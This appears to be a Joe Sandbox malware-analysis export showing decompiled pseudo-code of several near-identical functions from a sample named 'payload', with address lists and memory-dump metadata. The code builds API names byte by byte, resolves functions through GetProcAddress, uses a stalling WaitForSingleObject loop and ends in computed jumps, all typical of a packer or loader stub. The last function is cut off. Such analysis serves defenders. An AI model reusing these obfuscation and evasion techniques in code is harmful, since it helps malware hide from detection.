    Function 004014A8, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147synchronization
    C-Code - Quality: 45%
    			E004014A8() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				intOrPtr* _t38;
				void* _t42;
				void* _t46;
				void* _t48;
				intOrPtr* _t50;

				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L6:
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L18:
						L19:
						goto L19;
					}
					__eflags = _t48 - 0xfd00;
					if(_t48 < 0xfd00) {
						goto L18;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t38 = "pejpCreate";
					 *_t38 = 0x70616548;
					 *((short*)(_t38 + 4)) = 0x7243;
					 *((short*)(_t38 + 6)) = 0x6165;
					_push(_t38);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L18;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t48 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L18;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t50 =  *_t50 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L18;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t50 =  *_t50 - 1;
						__eflags =  *_t50;
					} while ( *_t50 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t42);
					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
					_t46 = _t42;
					 *0x405002 = _t46 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L18;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L18;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push("zzdjjqpqaxlgt");
				E00402E18(_t12);
				_push(E00401DA1);
				return E00401DA1;
			}



















    0x004014a8
    0x004014aa
    0x004014ad
    0x004014b2
    0x004014be
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004014c4
    0x004014c6
    0x004014c9
    0x004014ce
    0x004014da
    0x00000000
    0x00000000
    0x004014e0
    0x004014e2
    0x004014e5
    0x004014ea
    0x004014f6
    0x00000000
    0x00000000
    0x004014fc
    0x004014fe
    0x00401501
    0x00401506
    0x00401513
    0x00000000
    0x00000000
    0x00401519
    0x0040151b
    0x0040151e
    0x00401523
    0x0040152f
    0x00000000
    0x00000000
    0x00401535
    0x0040153a
    0x00401545
    0x00401546

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 0040123E, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 145synchronization
    C-Code - Quality: 44%
    			E0040123E() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				intOrPtr* _t37;
				void* _t41;
				void* _t45;
				void* _t47;
				intOrPtr* _t49;

				_push(0xf);
				 *_t49 =  *_t49 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L6:
					_push(1);
					 *_t49 =  *_t49 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L18:
						L19:
						goto L19;
					}
					__eflags = _t47 - 0xfd00;
					if(_t47 < 0xfd00) {
						goto L18;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t37 = "pejpCreate";
					 *_t37 = 0x70616548;
					 *((short*)(_t37 + 4)) = 0x7243;
					 *((short*)(_t37 + 6)) = 0x6165;
					_push(_t37);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t49 =  *_t49 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L18;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t47 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L18;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t49 =  *_t49 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L18;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t49 =  *_t49 - 1;
						__eflags =  *_t49;
					} while ( *_t49 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t41);
					 *((intOrPtr*)(_t49 + 4)) =  *((intOrPtr*)(_t49 + 4)) +  *((intOrPtr*)(_t41 + 0x3c));
					_t45 = _t41;
					 *0x405002 = _t45 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L18;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L18;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t47 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t47 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(1);
				 *_t49 =  *_t49 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t49 =  *_t49 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push(1);
				 *_t49 =  *_t49 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t49 =  *_t49 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push(E00402749);
				return E00402749;
			}



















    0x0040123e
    0x00401240
    0x00401243
    0x00401248
    0x00401255
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x0040125b
    0x0040125d
    0x00401260
    0x00401265
    0x00401271
    0x00000000
    0x00000000
    0x00401277
    0x00401279
    0x0040127c
    0x00401281
    0x0040128d
    0x00000000
    0x00000000
    0x00401293
    0x00401295
    0x00401298
    0x0040129d
    0x004012a9
    0x00000000
    0x00000000
    0x004012af
    0x004012b1
    0x004012b4
    0x004012b9
    0x004012c5
    0x00000000
    0x00000000
    0x004012d1
    0x004012d2

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00402868, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 144synchronization
    C-Code - Quality: 47%
    			E00402868() {
				void* _t11;
				void* _t13;
				struct HINSTANCE__* _t17;
				void* _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				void* _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				intOrPtr* _t36;
				void* _t40;
				void* _t44;
				void* _t46;
				intOrPtr* _t48;
				void* _t58;

				_push(0xf);
				 *_t48 =  *_t48 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L1:
					_push(1);
					 *_t48 =  *_t48 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					if(_t13 != 0 || _t46 < 0xfd00) {
						L13:
						L14:
						goto L14;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t17 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t17;
						_t36 = "pejpCreate";
						 *_t36 = 0x70616548;
						 *((short*)(_t36 + 4)) = 0x7243;
						 *((short*)(_t36 + 6)) = 0x6165;
						_push(_t36);
						_push(_t17);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t17);
						_push(1);
						 *_t48 =  *_t48 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t18 = E00401CAE(_t17); // executed
						if(_t18 != 0) {
							goto L13;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t46 - 4)) = _t21;
						_push(_t21);
						if(_t21 == 0) {
							goto L13;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t22 = E00402E18(_t21); // executed
						_push("true");
						 *_t48 =  *_t48 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t23 = E00402BB3(_t22); // executed
						if(_t23 != 0) {
							goto L13;
						}
						_push(0x1e);
						do {
							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t48 =  *_t48 - 1;
						} while ( *_t48 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t25); // executed
						_pop(_t40);
						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t48 + 4)) +  *((intOrPtr*)(_t40 + 0x3c));
						_t44 = _t40;
						 *0x405002 = _t44 + 0xa4;
						_t27 =  *0x405002;
						_t28 =  *_t27;
						 *0x405002 = _t28;
						_t58 =  *0x405002 - 0xfff;
						if(_t58 > 0) {
							goto L13;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t58 < 0) {
							goto L13;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t33);
						 *0x40501a =  *0x40501a + _t33;
						if( *((intOrPtr*)(_t46 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push( *0x4050cf);
				__eax = E00402AD0(__eax);
				_push( *0x4050cf);
				__eax = E00402AD0(__eax);
				_push(1);
				 *__esp =  *__esp - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				__eax = E00401CAE(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push(0xf);
				 *__esp =  *__esp - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				__eax = E00402BB3(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push("zzdjjqpqaxlgt");
				__eax = E00402E18(__eax);
				_push(1);
				 *__esp =  *__esp - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				__eax = E00401CAE(__eax);
				if(__eax != 0) {
					goto L1;
				}
				__eax = E00401000;
				_push(E00401000);
				return E00401000;
			}




















    0x00402868
    0x0040286a
    0x0040286d
    0x00402872
    0x0040287e
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x00402884
    0x0040288a
    0x0040288f
    0x00402895
    0x0040289a
    0x0040289c
    0x0040289f
    0x004028a4
    0x004028a9
    0x004028b0
    0x00000000
    0x00000000
    0x004028b6
    0x004028b8
    0x004028bb
    0x004028c0
    0x004028c5
    0x004028cd
    0x00000000
    0x00000000
    0x004028d3
    0x004028d8
    0x004028dd
    0x004028df
    0x004028e2
    0x004028e7
    0x004028ec
    0x004028f4
    0x00000000
    0x00000000
    0x004028fa
    0x00402900
    0x00402901

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004024DE, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 142synchronization
    C-Code - Quality: 45%
    			E004024DE() {
				void* _t11;
				void* _t13;
				struct HINSTANCE__* _t17;
				void* _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				void* _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				signed int _t34;
				void* _t35;
				intOrPtr* _t39;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				void* _t60;

				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L1:
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					if(_t13 != 0 || _t49 < 0xfd00) {
						L17:
						L18:
						goto L18;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t17 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t17;
						_t39 = "pejpCreate";
						 *_t39 = 0x70616548;
						 *((short*)(_t39 + 4)) = 0x7243;
						 *((short*)(_t39 + 6)) = 0x6165;
						_push(_t39);
						_push(_t17);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t17);
						_push(1);
						 *_t51 =  *_t51 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t18 = E00401CAE(_t17); // executed
						if(_t18 != 0) {
							goto L17;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t49 - 4)) = _t21;
						_push(_t21);
						if(_t21 == 0) {
							goto L17;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t22 = E00402E18(_t21); // executed
						_push("true");
						 *_t51 =  *_t51 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t23 = E00402BB3(_t22); // executed
						if(_t23 != 0) {
							goto L17;
						}
						_push(0x1e);
						do {
							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t51 =  *_t51 - 1;
						} while ( *_t51 != 0);
						_t51 = _t51 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t25); // executed
						_pop(_t43);
						 *_t51 =  *_t51 +  *((intOrPtr*)(_t43 + 0x3c));
						_t47 = _t43;
						 *0x405002 = _t47 + 0xa4;
						_t27 =  *0x405002;
						_t28 =  *_t27;
						 *0x405002 = _t28;
						_t60 =  *0x405002 - 0xfff;
						if(_t60 > 0) {
							goto L17;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t60 < 0) {
							goto L17;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t33);
						 *0x40501a =  *0x40501a + _t33;
						if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t34 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t34) != 0) {
					goto L1;
				}
				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L1;
				}
				_push( *0x4050cf);
				_t35 = E00402AD0(_t12);
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t35) != 0) {
					goto L1;
				}
				_push("zzdjjqpqaxlgt");
				E00402E18(_t12);
				_push(E00402749);
				return E00402749;
			}






















    0x004024de
    0x004024e0
    0x004024e3
    0x004024e8
    0x004024f4
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x004024fa
    0x004024fc
    0x004024ff
    0x00402504
    0x00402511
    0x00000000
    0x00000000
    0x00402517
    0x00402519
    0x0040251c
    0x00402521
    0x0040252e
    0x00000000
    0x00000000
    0x00402534
    0x0040253a
    0x0040253f
    0x00402541
    0x00402544
    0x00402549
    0x00402555
    0x00000000
    0x00000000
    0x0040255b
    0x00402560
    0x0040256b
    0x0040256c

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004016FF, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 140synchronization
    C-Code - Quality: 47%
    			E004016FF() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				intOrPtr* _t38;
				void* _t42;
				void* _t46;
				void* _t48;
				intOrPtr* _t50;

				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L5:
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L17:
						L18:
						goto L18;
					}
					__eflags = _t48 - 0xfd00;
					if(_t48 < 0xfd00) {
						goto L17;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t38 = "pejpCreate";
					 *_t38 = 0x70616548;
					 *((short*)(_t38 + 4)) = 0x7243;
					 *((short*)(_t38 + 6)) = 0x6165;
					_push(_t38);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L17;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t48 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
